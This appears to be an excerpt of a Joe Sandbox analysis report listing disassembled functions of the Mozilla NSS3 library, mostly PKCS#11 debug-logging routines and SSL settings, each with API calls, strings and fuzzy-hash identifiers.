PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C686EB9

Strings

C_Digest, xrefs: 6C686D81
(CK_INVALID_HANDLE), xrefs: 6C686DBC
*pulDigestLen = 0x%x, xrefs: 6C686EB4
pulDigestLen = 0x%p, xrefs: 6C686E42
hSession = 0x%x, xrefs: 6C686D9E, 6C686DAE
nvl, xrefs: 6C686E61, 6C686E95
pData = 0x%p, xrefs: 6C686DF5
pDigest = 0x%p, xrefs: 6C686E27
ulDataLen = %d, xrefs: 6C686E0E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nvl
API String ID: 1003633598-1341204591
Opcode ID: 261a3bbacfe6adc73c4ac988cf7018bb9c637e35c97ea9e987acacd698a5e4f7
Instruction ID: 419655d85b141ac2d809aaca5a68e7164a6365c178cd1c9b329bffc53f46eb1f
Opcode Fuzzy Hash: 261a3bbacfe6adc73c4ac988cf7018bb9c637e35c97ea9e987acacd698a5e4f7
Instruction Fuzzy Hash: 4B41C575612108AFDB109F55DE4DF8A3BB2AB4335CF044034E909ABA11DB30E949CBBE

Function 6C688820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C688846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C688874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688883

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C688899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6888BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6888D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6888EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C688907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C688979

Strings

(CK_INVALID_HANDLE), xrefs: 6C68887C
pulPartLen = 0x%p, xrefs: 6C688902
ulEncryptedPartLen = %d, xrefs: 6C6888CE
pPart = 0x%p, xrefs: 6C6888E7
pEncryptedPart = 0x%p, xrefs: 6C6888B5
hSession = 0x%x, xrefs: 6C68885E, 6C68886E
C_DecryptVerifyUpdate, xrefs: 6C688841
nvl, xrefs: 6C688921, 6C688955
*pulPartLen = 0x%x, xrefs: 6C688974

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$nvl
API String ID: 1003633598-1684826651
Opcode ID: 17abdb6c2f42fe2a4fcc97a297317cd5f9968aad65b0bb47ecd2f9cdc73be652
Instruction ID: dfad8d1764ff657458dda4ea05beb152c43b77fa0c7d313701ecfa552c9c7cef
Opcode Fuzzy Hash: 17abdb6c2f42fe2a4fcc97a297317cd5f9968aad65b0bb47ecd2f9cdc73be652
Instruction Fuzzy Hash: FB41B775602148AFDF10CF55DE4CF8A3BB1AB4631DF484035E909ABA61DB309958CBBE

Function 6C686960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C686986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6869B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6869C3

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6869D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6869FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C686A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C686A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C686A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C686AB9

Strings

(CK_INVALID_HANDLE), xrefs: 6C6869BC
C_DecryptUpdate, xrefs: 6C686981
pulPartLen = 0x%p, xrefs: 6C686A42
ulEncryptedPartLen = %d, xrefs: 6C686A0E
pPart = 0x%p, xrefs: 6C686A27
pEncryptedPart = 0x%p, xrefs: 6C6869F5
hSession = 0x%x, xrefs: 6C68699E, 6C6869AE
nvl, xrefs: 6C686A61, 6C686A95
*pulPartLen = 0x%x, xrefs: 6C686AB4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate$nvl
API String ID: 1003633598-367679851
Opcode ID: 10be5c96e41dd76fd28f40da211cf3bd169265f6bf964f986063334b7443d44e
Instruction ID: 3bee8a30bdf6f054f61b3fa04001351897be373cc8115e7e9cbb1e88cf7aa075
Opcode Fuzzy Hash: 10be5c96e41dd76fd28f40da211cf3bd169265f6bf964f986063334b7443d44e
Instruction Fuzzy Hash: 9441D971612108AFDF10CF55DE4CE8A3BB1AB4231CF048034E909ABA51DB34D958CBBE

Function 6C694C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C694C4C
EnterCriticalSection.KERNEL32(?), ref: 6C694C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C694CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C694CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C694CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C694DB7

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

TlsGetValue.KERNEL32 ref: 6C694DD7
EnterCriticalSection.KERNEL32(?), ref: 6C694DEC
PR_Unlock.NSS3(?), ref: 6C694E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C694E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C694E71
free.MOZGLUE(00000000), ref: 6C694E7A
PR_Unlock.NSS3(?), ref: 6C694EA2
TlsGetValue.KERNEL32 ref: 6C694EC1
EnterCriticalSection.KERNEL32(?), ref: 6C694ED6
PR_Unlock.NSS3(?), ref: 6C694F01
free.MOZGLUE(00000000), ref: 6C694F2A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: ddcf76185b09ff66af8f83aaf2c6521a0a2c4f4f69a7a3b883a3c515b195a743
Instruction ID: c7eadba8dfdcf8d112905d5e7f89dc14206fe8fe0b03632c4973cecca49b379e
Opcode Fuzzy Hash: ddcf76185b09ff66af8f83aaf2c6521a0a2c4f4f69a7a3b883a3c515b195a743
Instruction Fuzzy Hash: ADB10075A00206EFDB00EF68D884BBA77B4BF0A318F044174ED2597B11EB71E965CB99

Function 6C6E6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C6E6BF7), ref: 6C6E6EB6

Part of subcall function 6C641240: TlsGetValue.KERNEL32(00000040,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641267
Part of subcall function 6C641240: EnterCriticalSection.KERNEL32(?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C64127C
Part of subcall function 6C641240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641291
Part of subcall function 6C641240: PR_Unlock.NSS3(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C6412A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C78FC0A,6C6E6BF7), ref: 6C6E6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C6E6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C6E6EFC
PR_NewLock.NSS3 ref: 6C6E6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6E6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C6E6BF7), ref: 6C6E6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C6E6BF7), ref: 6C6E6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C6E6BF7), ref: 6C6E6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C6E6BF7), ref: 6C6E6FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6C6E6EF7
SSLFORCELOCKS, xrefs: 6C6E6F2B
SSLKEYLOGFILE, xrefs: 6C6E6EB1
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C6E6FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C6E6FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C6E6F4F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 9983c3250d8e395f5ef798fee75d9cd6aaf6a91e9736162d06b81e00f2da6d9c
Instruction ID: bfaa7fc9e1db0d61847c1811fb0bf64da549d59bd5bfb9ea467bde6d475f0f21
Opcode Fuzzy Hash: 9983c3250d8e395f5ef798fee75d9cd6aaf6a91e9736162d06b81e00f2da6d9c
Instruction Fuzzy Hash: 6EA119B2A5FD8587E7504A3CCD0178432A6AB8B32AF584377EA31C7ED6DB35D480824D

Function 6C6BE8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C6BE853,?,FFFFFFFF,?,?,6C6BB0CC,?,6C6BB4A0,?,00000000), ref: 6C6BE8D9

Part of subcall function 6C6B0D30: calloc.MOZGLUE ref: 6C6B0D50
Part of subcall function 6C6B0D30: TlsGetValue.KERNEL32 ref: 6C6B0D6D

Part of subcall function 6C6BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6BDAE2,?), ref: 6C6BC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C6BE972
PORT_ArenaMark_Util.NSS3(?), ref: 6C6BE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6BEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6BEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6BEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C6BEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6BEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C6BEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C6BEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C6BEBEC
free.MOZGLUE(00000000), ref: 6C6BEC58

Strings

Skl, xrefs: 6C6BE9CA, 6C6BEAAB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: Skl
API String ID: 759478663-3687196516
Opcode ID: 3a0831e74d88f3e1efa47a45ef7c14fd2372d3e4593b3496ea4c8ca1d4e42bce
Instruction ID: 3fa4654eefa9670544fa5103eb79d8a9c3ad9933db8891d7a023a2a02b3c3ce5
Opcode Fuzzy Hash: 3a0831e74d88f3e1efa47a45ef7c14fd2372d3e4593b3496ea4c8ca1d4e42bce
Instruction Fuzzy Hash: 1AC191B5E012059FEB00CF69D981BAA77F4BF09308F1405A9E916B7B51E731E824CBD9

Function 6C684E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C684E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C684EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684EC7

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C684EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C684F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C684F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C684F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C684F68

Strings

(CK_INVALID_HANDLE), xrefs: 6C684EC0, 6C684F13
ulCount = %d, xrefs: 6C684F63
hSession = 0x%x, xrefs: 6C684EA2, 6C684EB2
nvl, xrefs: 6C684F82, 6C684FB2
C_GetAttributeValue, xrefs: 6C684E7E
hObject = 0x%x, xrefs: 6C684EF5, 6C684F05
pTemplate = 0x%p, xrefs: 6C684F4A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nvl
API String ID: 1003633598-93353135
Opcode ID: fb92c4ffa5f634867e1735a83aa7d0aa6f90120fdeed323078e37e2375f306a0
Instruction ID: f6e14b3d736c57f279b726a741a7e004b96aca9608d797e3e296e14d28d058eb
Opcode Fuzzy Hash: fb92c4ffa5f634867e1735a83aa7d0aa6f90120fdeed323078e37e2375f306a0
Instruction Fuzzy Hash: A741B871603148ABDB00DF55DE8CFAA77B9AF5231DF044038E9096BA51DB709948CB7E

Function 6C684CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C684CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C684D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684D37

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C684D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C684D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C684DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C684DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C684E20

Strings

(CK_INVALID_HANDLE), xrefs: 6C684D30, 6C684D83
hSession = 0x%x, xrefs: 6C684D12, 6C684D22
nvl, xrefs: 6C684DD4, 6C684DFF
C_GetObjectSize, xrefs: 6C684CEE
pulSize = 0x%p, xrefs: 6C684DB7
hObject = 0x%x, xrefs: 6C684D65, 6C684D75
*pulSize = 0x%x, xrefs: 6C684E1B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nvl
API String ID: 1003633598-284515238
Opcode ID: 278c88c42d84bd266fd638f538553036082ef0850af10a77a7d5f224c25a59cc
Instruction ID: ff990fbe767b50cf8c292360391d709c143b795392f06256ba8e5ebdc624f9ef
Opcode Fuzzy Hash: 278c88c42d84bd266fd638f538553036082ef0850af10a77a7d5f224c25a59cc
Instruction Fuzzy Hash: 9341EB71602208AFDB009F10DE9CF6A37B9EB4634DF048034F9096BA51DB709948CB7E

Function 6C682F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C682F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C682F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C682F63

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C682F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C682F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C682FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C682FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C682FE7

Strings

(CK_INVALID_HANDLE), xrefs: 6C682F5C
C_SetPIN, xrefs: 6C682F21
hSession = 0x%x, xrefs: 6C682F3E, 6C682F4E
pNewPin = 0x%p, xrefs: 6C682FC9
nvl, xrefs: 6C682FFF, 6C683030
ulNewLen = %d, xrefs: 6C682FE2
ulOldLen = %d, xrefs: 6C682FB0
pOldPin = 0x%p, xrefs: 6C682F95

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nvl
API String ID: 1003633598-3987637513
Opcode ID: a0c0929151f935d472a087e52fedf7264f646c289ca27a79c4ce82b28266d8da
Instruction ID: a4b79b0e1421ec2e2d805b612606df912baf784089d4f8c17c66037e965dcc03
Opcode Fuzzy Hash: a0c0929151f935d472a087e52fedf7264f646c289ca27a79c4ce82b28266d8da
Instruction Fuzzy Hash: 9731B375603148AFDB009F55DE4CE8A7BB2EB4735DF484034E909ABB51DB309948CBAE

Function 6C68A9A0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6C68A9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C68A9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AA03

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C68AA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C68AA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C68AA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6C68AA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6C68AA87

Strings

ulAssociatedDataLen = 0x%p, xrefs: 6C68AA82
C_DecryptMessageBegin, xrefs: 6C68A9C1
pParameter = 0x%p, xrefs: 6C68AA35
(CK_INVALID_HANDLE), xrefs: 6C68A9FC
ulParameterLen = 0x%p, xrefs: 6C68AA50
pAssociatedData = 0x%p, xrefs: 6C68AA69
hSession = 0x%x, xrefs: 6C68A9DE, 6C68A9EE
nvl, xrefs: 6C68AA9F, 6C68AAD3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
